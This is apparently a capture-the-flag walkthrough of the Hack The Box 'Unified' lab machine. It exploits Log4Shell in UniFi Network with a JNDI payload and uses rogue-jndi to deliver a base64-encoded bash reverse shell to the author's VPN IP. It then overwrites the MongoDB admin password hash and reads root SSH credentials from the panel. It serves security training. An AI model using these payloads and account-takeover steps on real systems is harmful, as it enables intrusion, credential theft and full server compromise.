nopedawn

HTB | Unified - Starting Point

Created: Mar 25, 2026
Last edited: Mar 25, 2026

https://app.hackthebox.com/machines/Unified/



Unified | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Using nmap to enumerate all open ports in the target

nmap -sC -sV <MACHINE-IP>
# or sudo nmap -sS <MACHINE-IP>
port scanning
nopedawn@npdn ~/L/H/S/Unified> nmap -sC -sV 10.129.51.77
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-25 10:06 WIB
Nmap scan report for 10.129.51.77
Host is up (0.52s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Wed, 25 Mar 2026 03:08:00 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
|     Found</h1></body></html>
|   GetRequest:
|     HTTP/1.1 302
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Wed, 25 Mar 2026 03:07:55 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 302
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Wed, 25 Mar 2026 03:07:57 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Wed, 25 Mar 2026 03:07:59 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|     Request</h1></body></html>
|   Socks5:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Wed, 25 Mar 2026 03:08:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://10.129.51.77:8443/manage
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=3/25%Time=69C3518B%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080
SF:/manage\r\nContent-Length:\x200\r\nDate:\x20Wed,\x2025\x20Mar\x202026\x
SF:2003:07:55\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"H
SF:TTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCon
SF:tent-Length:\x200\r\nDate:\x20Wed,\x2025\x20Mar\x202026\x2003:07:57\x20
SF:GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x204
SF:00\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:
SF:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Wed,\x2025\x20Mar\x202026\
SF:x2003:07:59\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><ht
SF:ml\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x2
SF:0Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family
SF::Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;ba
SF:ckground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size
SF::16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{c
SF:olor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:n
SF:one;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\
SF:x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langu
SF:age:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Wed,\x2025\x20Mar\x202
SF:026\x2003:08:00\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html
SF:><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x9
SF:3\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x
SF:20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\
SF:r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\
SF:r\nContent-Length:\x20435\r\nDate:\x20Wed,\x2025\x20Mar\x202026\x2003:0
SF:8:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x2
SF:0Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma
SF:,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgroun
SF:d-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</
SF:style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.77 seconds
scan port only
nopedawn@npdn ~/L/H/S/Unified> sudo nmap -sS 10.129.51.77
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-25 10:13 WIB
Nmap scan report for 10.129.51.77
Host is up (0.45s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
6789/tcp open  ibm-db2-admin
8080/tcp open  http-proxy
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds

After port-scanning, the service is running in linux machine and there are four service opens in tcp

  • 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  • 6789/tcp open ibm-db2-admin?
  • 8080/tcp open http-proxy
  • 8443/tcp open ssl/nagios-nsca Nagios NSCA

In port 8080 & port 8443 we got some bunch of full output and look like we try to performing pentest UniFi Network with version 6.4.54

From task question I’ve identified this vulnerability is CVE-2021-44228 (Log4j Unifi vulnerabilities ports)

CVE-2021-44228 Detail
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (see more)

Let’s try to exploit, this time I’ll follow the POC from this article below

Also, I’ll use BurpSuite Community Edition as Interceptor & Repeater

Initial Header will look like this, make sure checklist the remember me

Initial Header
POST /api/login HTTP/1.1
Host: 10.129.51.77:8443
Content-Length: 67
Sec-Ch-Ua-Platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="146", "Not-A.Brand";v="24", "Google Chrome";v="146"
Content-Type: application/json; charset=utf-8
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Origin: https://10.129.51.77:8443
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://10.129.51.77:8443/manage/account/login?redirect=%2Fmanage
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: keep-alive

{"username":"test","password":"test","remember":true,"strict":true}

Now, we have to replace remember me value with our payload, make sure to replace to your VPN IP

intercept payload
{
  "username":"test",
  "password":"test",
  "remember":"${jndi:ldap://10.10.16.155:389/o=tomcat}",
  "strict":true
}

Then, I’ll try to dump request in port 389 (port for LDAP)

Request:

tcpdump request
nopedawn@npdn ~/L/H/S/Unified> sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

And now, send it

Response:

tcpdump response
nopedawn@npdn ~/L/H/S/Unified> sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:52:05.358816 IP unified.htb.50362 > 10.10.16.155.ldap: Flags [S], seq 1700860423, win 64240, options [mss 1335,sackOK,TS val 4134700970 ecr 0,nop,wscale 7], length 0
11:52:05.358885 IP 10.10.16.155.ldap > unified.htb.50362: Flags [R.], seq 0, ack 1700860424, win 0, length 0

Next, reverse-shell

First, we need requirements

install requirements
sudo apt-get install maven && \
git clone https://github.com/veracode-research/rogue-jndi && \
mv ~/.m2/settings.xml ~/.m2/settings.xml.bak && \
cd rogue-jndi && \
mvn package
check mvn version
nopedawn@npdn ~/L/H/S/Unified> mvn -v
Apache Maven 3.6.3
Maven home: /usr/share/maven
Java version: 22.0.2, vendor: Ubuntu, runtime: /usr/lib/jvm/java-22-openjdk-amd64
Default locale: en, platform encoding: UTF-8
OS name: "linux", version: "6.6.87.2-microsoft-standard-wsl2", arch: "amd64", family: "unix"

We’ve to build payload and encoded to base64

encode payload to base64
nopedawn@npdn ~/L/H/S/Unified> echo -n 'bash -c bash -i >&/dev/tcp/10.10.16.155/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==
run roguejndi
nopedawn@npdn ~/L/H/S/Unified> java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "10. 10.16.155"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10. 10.16.155:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10. 10.16.155:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10. 10.16.155:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10. 10.16.155:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10. 10.16.155:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10. 10.16.155:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10. 10.16.155:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10. 10.16.155:1389/o=reference to artsploit.controllers.RemoteReference

Set listener

set listener
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...

This status below identified as the payload successfully sended

sending payload
nopedawn@npdn ~/L/H/S/Unified> java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "10. 10.16.155"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
...
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

After send payload two times or more in BurpSuite Repeater, I’ve finally got the shell

successfully gain shell
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.155] from (UNKNOWN) [10.129.51.77] 57740
whoami
unifi
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)

Foothold

User flag is stored in home/michael/user.txt

user flag
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.155] from (UNKNOWN) [10.129.51.77] 57740
whoami
unifi
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
ls
bin
data
dl
lib
logs
run
webapps
work
find / -name user.txt 2>/dev/null
/home/michael/user.txt
cat /home/michael/user.txt
REDACTED

We need to stabilize our shell using bash

stabilize shell
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$

From our task we have to identified mongodb port service running in machine

see service running with ps aux
unifi@unified:/usr/lib/unifi$ ps aux | grep mongo
ps aux | grep mongo
unifi         67  0.2  4.1 1103744 85416 ?       Sl   03:05   0:21 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       4183  0.0  0.0  11468  1072 pts/0    S+   05:34   0:00 grep mongo
unifi@unified:/usr/lib/unifi$

Let’s connect to that Mongo DB service

mongo --port 27117
mongo connect
unifi@unified:/usr/lib/unifi$ mongo --port 27117
mongo --port 27117
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        http://docs.mongodb.org/
Questions? Try the support group
        http://groups.google.com/group/mongodb-user
2026-03-25T05:37:27.311+0000 I STORAGE  [main] In File::open(), ::open for '/home/unifi/.mongorc.js' failed with No such file or directory
Server has startup warnings:
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten]
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten]
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten]
>

Show all databases

show all databases
> show databases
shshow databases
ace       0.002GB
ace_stat  0.000GB
admin     0.000GB
config    0.000GB
local     0.000GB
>

In mongodb there are three databases as Default, and two databases for UniFi Network

Let’s enumerate all users within the database

db.admin.find()
db admin find
> use ace
ususe ace
switched to db ace
> db.version()
dbdb.version()
3.6.3
> db.admin.find()
dbdb.admin.find()
{ "_id" : ObjectId("61ce278f46e0fb0012d47ee4"), "name" : "administrator", "email" : "administrator@unified.htb", "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.", "time_created" : NumberLong(1640900495), "last_site_name" : "default", "ui_settings" : { "neverCheckForUpdate" : true, "statisticsPrefferedTZ" : "SITE", "statisticsPreferBps" : "", "tables" : { "device" : { "sortBy" : "type", "isAscending" : true, "initialColumns" : [ "type", "deviceName", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ], "columns" : [ "type", "deviceName", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "lastSeen", "downlink", "uplink", "dailyUsage", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ] }, "client" : { "sortBy" : "physicalName", "isAscending" : true, "initialColumns" : [ "status", "clientName", "physicalName", "connection", "ip", "experience", "Downlink", "Uplink", "dailyUsage" ], "columns" : [ "status", "clientName", "mac", "physicalName", "connection", "network", "interface", "wifi_band", "ip", "experience", "Downlink", "Uplink", "dailyUsage", "uptime", "channel", "Uplink_apPort", "signal", "txRate", "rxRate", "first_seen", "last_seen", "rx_packets", "tx_packets" ], "filters" : { "status" : { "active" : true }, "connection_type" : { "ng" : true, "na" : true, "wired" : true, "vpn" : true }, "clients_type" : { "users" : true, "guests" : true }, "device" : { "device" : "" } } }, "unifiDevice" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceNetwork" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceAccess" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceProtect" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceTalk" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "insights/wifiScanner" : { "sortBy" : "apCount", "isAscending" : false, "initialColumns" : [ "apCount", "essid", "bssid", "security", "radio", "signal", "channel", "band", "bw", "oui", "date", "ap_mac" ], "columns" : [ "apCount", "essid", "bssid", "security", "radio", "signal", "channel", "band", "bw", "oui", "date", "ap_mac" ] }, "insights/wifiMan" : { "sortBy" : "date", "isAscending" : false, "initialColumns" : [ "clinet_name", "client_wifi_experience", "device_model", "device_name", "wlan_essid", "client_signal", "wlan_channel_width", "down", "up", "endPoint", "rate", "date" ], "columns" : [ "clinet_name", "client_wifi_experience", "device_model", "device_name", "wlan_essid", "client_signal", "wlan_channel_width", "down", "up", "endPoint", "rate", "date" ] } }, "topologyViewSettings" : { "showAllDevices" : true, "showAllClients" : true, "show2GClients" : true, "show5GClients" : true, "showWiredClients" : true, "showSSID" : false, "showWifiExperience" : true, "showRadioChannel" : false, "showWifiStandards" : false, "showWiredSpeed" : false, "showWiredPorts" : false, "online" : true, "offline" : true, "isolated" : true, "pending_adoption" : true, "managed_by_another_console" : true }, "preferences" : { "alertsPosition" : "top_right", "allowHiddenDashboardModules" : false, "browserLogLevel" : "INFO", "bypassAutoFindDevices" : false, "bypassConfirmAdoptAndUpgrade" : false, "bypassConfirmBlock" : false, "bypassConfirmRestart" : false, "bypassConfirmUpgrade" : false, "bypassHybridDashboardNotice" : false, "bypassDashboardUdmProAd" : false, "bypassHybridSettingsNotice" : false, "dateFormat" : "MMM DD YYYY", "dismissWlanOverrides" : false, "enableNewUI" : false, "hideV3SettingsIntro" : true, "isAppDark" : true, "isPropertyPanelFixed" : true, "isRegularGraphForAirViewEnabled" : false, "isResponsive" : false, "isSettingsDark" : true, "isUndockedByDefault" : false, "noWhatsNew" : false, "propertyPanelCollapse" : false, "propertyPanelMultiMode" : true, "refreshButtonEnabled" : false, "refreshRate" : "2MIN", "refreshRateRememberAll" : false, "rowsPerPage" : 50, "showAllPanelActions" : false, "showWifimanAppsBanner" : true, "timeFormat" : "H:mm", "use24HourTime" : true, "useBrowserTheme" : false, "useSettingsPanelView" : false, "websocketEnabled" : true, "withStickyTableActions" : true, "isUlteModalClosed" : false, "isUbbAlignmentToolModalClosed" : false, "offlineClientTimeframe" : 24 }, "preferredLanguage" : "en", "dashboardConfig" : { "lastActiveDashboardId" : "61ce269d46e0fb0012d47ec6" } }, "requires_new_password" : false, "email_alert_enabled" : true, "email_alert_grouping_enabled" : true, "html_email_enabled" : true, "is_professional_installer" : false, "push_alert_enabled" : true }
{ "_id" : ObjectId("61ce4a63fbce5e00116f424f"), "email" : "michael@unified.htb", "name" : "michael", "x_shadow" : "$6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0", "requires_new_password" : false, "time_created" : NumberLong(1640909411), "last_site_name" : "default", "email_alert_enabled" : false, "email_alert_grouping_enabled" : false, "email_alert_grouping_delay" : 60, "push_alert_enabled" : false }
{ "_id" : ObjectId("61ce4ce8fbce5e00116f4251"), "email" : "seamus@unified.htb", "name" : "Seamus", "x_shadow" : "$6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.", "requires_new_password" : true, "time_created" : NumberLong(1640910056), "last_site_name" : "default" }
{ "_id" : ObjectId("61ce4d27fbce5e00116f4252"), "email" : "warren@unified.htb", "name" : "warren", "x_shadow" : "$6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.", "requires_new_password" : true, "time_created" : NumberLong(1640910119), "last_site_name" : "default" }
{ "_id" : ObjectId("61ce4d51fbce5e00116f4253"), "email" : "james@unfiied.htb", "name" : "james", "x_shadow" : "$6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1", "requires_new_password" : false, "time_created" : NumberLong(1640910161), "last_site_name" : "default" }
>

To get the clean output use

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

The function we use to update users within the database is

db.admin.update()
update admin db
> db.admin.update()
dbdb.admin.update()
2026-03-25T05:52:59.133+0000 E QUERY    [thread1] Error: need a query :
DBCollection.prototype._parseUpdate@src/mongo/shell/collection.js:441:1
DBCollection.prototype.update@src/mongo/shell/collection.js:483:18
@(shell):1:1
>

From previous output db.admin.find() we need to go the root user password

{ "_id" : ObjectId("61ce278f46e0fb0012d47ee4"), "name" : "administrator", "email" : "administrator@unified.htb", "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",

In value

"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4."

It look like /etc/shadow SHA-512 hash, to understand etc shadow read this article

Let’s try use mkpasswd to generate, encrypt, or hash passwords, often for user accounts

encrypt new password with sha512
nopedawn@npdn ~/L/H/S/Unified> mkpasswd -m SHA-512 SujatmikoArafuru321
$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0

Let’s update admin user password

update admin password
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0"}})
admin password updated
lldb.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$N9G8lAmz4mW/Ldo1$sRMAL6oRC4lfcrl.cnV6W6pUprMdUQJr7E/VfAt8Gs9gtYeHQdj9XqofI6fxZRa5m5AOYRSZ7l.8DIE7qc2PG0"}})
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
>

Now, we can logged in to https://10.129.51.77:8443/ using previous password I’ve created

credential:

  • administrator:SujatmikoArafuru321

Voila! logged in

We can now go to settings

/manage/site/default/settings/site

Look for Device Authentication, got the ssh credential to gain root access

SSH Authentication:

  • Username: root
  • Password: NotACrackablePassword4U2022
connect root via ssh
nopedawn@npdn ~/L/H/S/Unified> ssh root@10.129.51.77
The authenticity of host '10.129.51.77 (10.129.51.77)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.51.77' (ED25519) to the list of known hosts.
root@10.129.51.77's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


root@unified:~# whoami
root
root@unified:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unified:~#

Use find to search root.txt, the root flag is stored in /root/root.txt

root flag
root@unified:~# find / -name root.txt 2>/dev/null
/root/root.txt
root@unified:~# cat /root/root.txt
REDACTED
root@unified:~#

Source:

https://nvd.nist.gov/vuln/detail/cve-2021-44228
https://community.ui.com/…/CVE-2021-44228/
https://community.ui.com/…/Password-recovery-db-admin-find-empty/
https://www.sprocketsecurity.com/…/another-log4j-on-the-fire-unifi
https://www.mongodb.com/…/db.collection.update

Prev
...
Next
HTB | Vaccine - Starting Point